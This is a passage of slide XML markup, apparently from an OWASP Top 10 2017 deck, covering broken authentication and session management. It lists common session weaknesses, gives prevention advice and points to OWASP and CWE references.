              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ession IDs are exposed in the URL (e.g., URL rewriting).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ession IDs are vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>session fixation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ession IDs don’t timeout, or user sessions or authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ession IDs aren’t rotated after successful login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asswords, session IDs, and other credentials are sent over unencrypted connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> See 2017-A6.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>See the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requirement areas V2 and V3 for more details.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For a more complete set of requirements and problems to avoid in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ASVS requirements areas for Authentication (V2) and Session Management (V3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Authentication Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Forgot Password Cheat Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Password Storage Cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId8"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Session Management Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId12"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 287 on Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE Entry 384 on Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The primary recommendation for an organization is to make available to developers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A single set of strong authentication and session management controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Such controls should strive to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meet all the authentication and session management requirements defined in OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (ASVS) areas V2 (Authentication) and V3 (Session Management).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>have a simple interface for developers. Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ESAPI Authenticator and User APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as good examples to emulate, use, or build upon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See 2017-A3.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
